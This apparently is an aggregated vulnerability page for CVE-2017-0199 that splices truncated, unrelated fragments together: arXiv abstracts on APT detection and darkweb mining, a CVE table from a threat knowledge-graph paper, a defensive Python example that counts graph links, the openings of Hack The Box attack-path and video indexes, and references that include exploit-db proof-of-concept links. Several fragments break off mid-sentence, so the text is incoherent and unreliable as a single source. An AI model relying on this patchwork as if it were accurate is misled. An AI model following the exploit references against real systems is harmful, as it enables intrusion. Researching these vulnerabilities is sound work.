Xiangmin Shen and Lingzhi Wang (Northwestern University, Evanston, Illinois, USA; both authors contributed equally), Zhenyuan Li (Zhejiang University, Hangzhou, Zhejiang, China), Yan Chen (Northwestern University, Evanston, Illinois, USA), Wencheng Zhao and Dawei Sun (Ant Group, Hangzhou, Zhejiang, China), Jiashui Wang and Wei Ruan (Zhejiang University, Hangzhou, Zhejiang, China)
## Abstract
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Almuthanna Alageel and Sergio Maffeis (Department of Computing, Imperial College London, London, United Kingdom)
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
Linking Threat Tactics, Techniques, and Patterns with Defensive Weaknesses, Vulnerabilities and Affected Platform Configurations for Cyber Hunting
arxiv_fulltext·2021-02-10·CVSS 8.8
CVE-2017-11882 [HIGH] Linking Threat Tactics, Techniques, and Patterns with Defensive Weaknesses, Vulnerabilities and Affected Platform Configurations for Cyber Hunting
Top 10 Most Exploited Vulnerabilities 2016-2019 (https://us-cert.cisa.gov/ncas/alerts/aa20-133a)

| CVE | CVSS Score | Number of Tactics | Number of Techniques | Number of CAPECs | Number of CWEs | Number of CPEs |
|---|---|---|---|---|---|---|
| CVE-2017-11882 | 8.55 | 0 | 0 | 12 | 1 | 4 |
| CVE-2017-0199 | 8.55 | 0 | 0 | 0 | 0 | 9 |
| CVE-2017-5638 | 10.0 | 1 | 3 | 51 | 1 | 53 |
| CVE-2012-0158 | 9.3 | 0 | 0 | 3 | 1 | 29 |
| CVE-2019-0604 | 8.65 | 1 | 3 | 51 | 1 | 4 |
| CVE-2017-0143 | 0.0 (not listed in BRON, but NVD rates it high severity) | 0 | 0 | 0 | 0 | 0 |
| CVE-2018-4878 | 8.65 | 0 | 0 | 0 | 1 | 3 |
| CVE-2017-8759 | 8.55 | 1 | 3 | 51 | 1 | 8 |
| CVE-2015-1641 | 9.3 | 0 | 0 | 0 | 1 | 11 |
| CVE-2018-7600 | 8.65 | 1 | 3 | 51 | 1 | 4 |

4 out of Top 10 Vulnerabilities share the follow
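The counts in the table above are reachability counts over a layered knowledge graph: BRON links tactics to techniques, techniques to CAPEC attack patterns, CAPECs to CWE weaknesses, CWEs to CVEs and CVEs to CPE platform entries, which is the column order of the table. The Python below is an added example written for this page, not BRON's code or the paper's; it walks such a graph from a CVE and tallies what is reachable in each layer. The edges are constructed for illustration, and the ATT&CK, CAPEC, CWE and CPE identifiers in them are labels, not verified mappings. It shows the effect visible in the table for CVE-2017-0199: a CVE with platform links but no CWE link can have zero tactics, techniques, CAPECs and CWEs while still having several CPEs, and it shows why the walk has to move one layer at a time in one direction, so that a shared CWE does not pull in another CVE's platforms.

```python
"""Layered threat-knowledge-graph walk (example code for this page, not BRON's).

Node ids are "<layer>:<id>". The SAMPLE_EDGES below are constructed to
illustrate the mechanics; they are not BRON data and the identifier pairings
are hypothetical.
"""
from collections import defaultdict, deque

# Layer order used for the walk, matching the table's column order.
LAYERS = ["tactic", "technique", "capec", "cwe", "cve", "cpe"]
LAYER_INDEX = {name: i for i, name in enumerate(LAYERS)}

# Constructed sample edges (hypothetical pairings, not verified mappings).
SAMPLE_EDGES = [
    ("tactic:TA0001", "technique:T1190"),
    ("technique:T1190", "capec:CAPEC-242"),
    ("technique:T1190", "capec:CAPEC-88"),
    ("capec:CAPEC-242", "cwe:CWE-94"),
    ("capec:CAPEC-88", "cwe:CWE-94"),
    ("cwe:CWE-94", "cve:CVE-2017-5638"),
    ("cve:CVE-2017-5638", "cpe:cpe:2.3:a:apache:struts:2.3.5"),
    ("cve:CVE-2017-5638", "cpe:cpe:2.3:a:apache:struts:2.5.10"),
    # A second CVE sharing the same CWE; its CPEs must not leak into the
    # counts of CVE-2017-5638 through the shared weakness node.
    ("cwe:CWE-94", "cve:CVE-2018-7600"),
    ("cve:CVE-2018-7600", "cpe:cpe:2.3:a:drupal:drupal:7.0"),
    # Platform links but no CWE link: nothing above the CVE layer is reachable.
    ("cve:CVE-2017-0199", "cpe:cpe:2.3:a:microsoft:office:2016"),
    ("cve:CVE-2017-0199", "cpe:cpe:2.3:a:microsoft:office:2013:sp1"),
    ("cve:CVE-2017-0199", "cpe:cpe:2.3:o:microsoft:windows_7:-:sp1"),
]


def layer_of(node):
    """Return the layer name encoded as the prefix of a node id."""
    layer = node.split(":", 1)[0]
    if layer not in LAYER_INDEX:
        raise ValueError(f"unknown layer in node id {node!r}")
    return layer


def build_adjacency(edges):
    """Undirected adjacency, rejecting edges that skip a layer."""
    adj = defaultdict(set)
    for a, b in edges:
        if abs(LAYER_INDEX[layer_of(a)] - LAYER_INDEX[layer_of(b)]) != 1:
            raise ValueError(f"edge {a} -> {b} does not join adjacent layers")
        adj[a].add(b)
        adj[b].add(a)
    return adj


def reachable(adj, start, direction):
    """BFS from `start`, moving exactly one layer per hop in `direction`
    (-1 toward tactics, +1 toward platforms). Monotone movement stops the
    walk from passing through a shared CWE into another CVE's neighbourhood,
    which would inflate the counts."""
    seen = {start}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        target = LAYER_INDEX[layer_of(node)] + direction
        for nxt in adj.get(node, ()):
            if LAYER_INDEX[layer_of(nxt)] == target and nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    seen.discard(start)
    return seen


def link_counts(edges, cve):
    """Per-layer counts of nodes reachable from a CVE, in the table's shape."""
    adj = build_adjacency(edges)
    node = f"cve:{cve}"
    nodes = reachable(adj, node, -1) | reachable(adj, node, +1)
    counts = {layer: 0 for layer in LAYERS if layer != "cve"}
    for n in nodes:
        counts[layer_of(n)] += 1
    return counts


if __name__ == "__main__":
    for cve in ("CVE-2017-5638", "CVE-2017-0199", "CVE-2018-7600"):
        print(cve, link_counts(SAMPLE_EDGES, cve))
```

Because the walk is monotone, CVE-2017-5638 keeps two CPEs even though CWE-94 also links to CVE-2018-7600, and CVE-2017-0199 reports zeros everywhere except the CPE column. Replacing the constructed edge list with a real export would give the same kind of figures the paper tabulates, subject to the same caveat the table's CVE-2017-0143 row makes: a CVE absent from the graph, or present without a CWE edge, scores zero regardless of its severity.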
arXiv
Mining user interaction patterns in the darkweb to predict enterprise cyber incidents
arxiv_fulltext·2020-06-20
Soumajyoti Sarkar, Mohammad Almukaynizi and Paulo Shakarian (Arizona State University); Jana Shakarian (Cyber Reconnaissance Inc.)
## Abstract
With rise in security breaches over the past few years, there has been an increasing need to mine insights from social media platforms to raise alerts of possible attacks in an attempt to defend conflict during competition. In this study, we attempt to build a framework that utilizes unconventional signals from the darkweb forums by leveraging the reply network structure of user interactions with the goal of predicting
CTF
attack-paths
ctf_writeups·CVSS 6.0
[MEDIUM] attack-paths
# Attack Path Diagrams
Visual flowcharts mapping the complete attack chain for 30 popular Hack The Box machines, from initial reconnaissance to root/SYSTEM.
## How to Read These Diagrams
Each diagram traces the full exploitation path for a machine using a top-down flowchart. The color coding indicates the phase of the attack:
- **Green nodes** - Reconnaissance and enumeration
- **Orange nodes** - Initial access / foothold
- **Blue nodes** - Post-exploitation and lateral movement
- **Red nodes** - Privilege escalation
- **Purple nodes** - Root or SYSTEM achieved
Nodes in
CTF
ippsec-video-index
ctf_writeups·CVSS 8.6
[HIGH] ippsec-video-index
# IppSec HTB Video Index - Complete Reference
> The most comprehensive index of IppSec's HackTheBox video walkthroughs.
> Data sourced from [ippsec.rocks](https://ippsec.rocks) dataset, GitHub, and community resources.
> Last updated: 2026-04-10
## Stats
| Category | Count |
|----------|-------|
| HTB Machine Walkthroughs | 432 |
| UHC (Ultimate Hacking Championship) | 12 |
| HTB Sherlocks (DFIR) | 7 |
| VulnHub Machines | 4 |
| Tutorials / Methodology / Special | 61 |
| HTB Academy Modules | 17 |
| **Total Unique Content** | **533** |
| Total Searchable Entries (timestamps) | 9,245 |
## Key Resources
| Resource | URL |
|----------|-----|
| YouTube Channel | [youtube.com/ippsec](https://youtube.com/ippsec) |
| Searchable Video Index | [ippsec.rocks](https://ippsec.rocks) |
| GitHub |
References
- http://rewtin.blogspot.nl/2017/04/cve-2017-0199-practical-exploitation-poc.html
- http://www.securityfocus.com/bid/97498
- http://www.securitytracker.com/id/1038224
- https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
- https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199
- https://www.exploit-db.com/exploits/41894/
- https://www.exploit-db.com/exploits/41934/
- https://www.exploit-db.com/exploits/42995/
- https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
- https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-0199
2017-04-12 Published
2021-11-03 Added to CISA KEV
Exploited in the wild